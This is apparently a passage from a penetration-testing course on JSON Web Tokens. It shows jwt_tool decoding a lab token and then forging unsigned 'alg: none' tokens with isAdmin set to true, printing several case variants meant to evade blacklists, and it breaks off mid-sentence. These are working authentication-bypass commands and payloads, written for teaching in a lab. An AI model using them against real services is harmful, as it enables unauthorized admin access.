Tools of the Trade & Vulnerability Prevention

Tools of the Trade

Penetration testers commonly use jwt_tool to analyze and identify vulnerabilities in JWTs. The installation process only requires cloning the repository and installing the required dependencies:

eldeim@htb[/htb]$ git clone https://github.com/ticarpi/jwt_tool

eldeim@htb[/htb]$ pip3 install -r requirements.txt

We can then run the tool by executing the python script jwt_tool.py:

From the output of jwt_tool.py, we know that it can analyze JWTs, brute-force JWT secrets, and perform other various attacks, including those discussed in previous sections.

JWT Analysis

We can analyze any given JWT with jwt_tool by providing it as an argument. Let us test it with a JWT from a previous section:

eldeim@htb[/htb]$ python3 jwt_tool/jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0

=====================
Decoded Token Values:
=====================

Token header values:
[+] alg = "HS256"
[+] typ = "JWT"

Token payload values:
[+] user = "htb-stdnt"
[+] isAdmin = False
[+] exp = 1711186044    ==> TIMESTAMP = 2024-03-23 10:27:24 (UTC)
[-] TOKEN IS EXPIRED!

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

As we can see, the tool provides us with all the information contained in the JWT, including the JWT's header and the JWT's payload. It even lets us know that the token provided has already expired since the timestamp in the exp claim was in the past.

Forging JWTs

We can use jwt_tool to programmatically forge altered JWTs instead of doing so manually, as in the previous sections. For instance, we can forge a JWT which uses the none algorithm by specifying the -X a flag. Additionally, we can tell the tool to set the isAdmin claim to true by specifying the following flags: -pc isAdmin -pv true -I. Let us combine these flags to forge a JWT that enables us to obtain administrator privileges in the lab from the previous sections:

eldeim@htb[/htb]$ python3 jwt_tool/jwt_tool.py -X a -pc isAdmin -pv true -I eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0

<SNIP>

jwttool_811c498343f37b0d48592a9743187ebf - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_fb9f8d45657b7264e23d8e17a2cc438e - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_c2d4f2dda19221badff0ee7d78e80575 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_367f25ee04f77adb0cb665bf07d80f3c - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.

As we can see, the tool generated JWTs that use the none algorithm with various lower- and uppercase combinations, aiming to bypass potential blacklists. We can confirm that the token contains the claims we injected by analyzing it: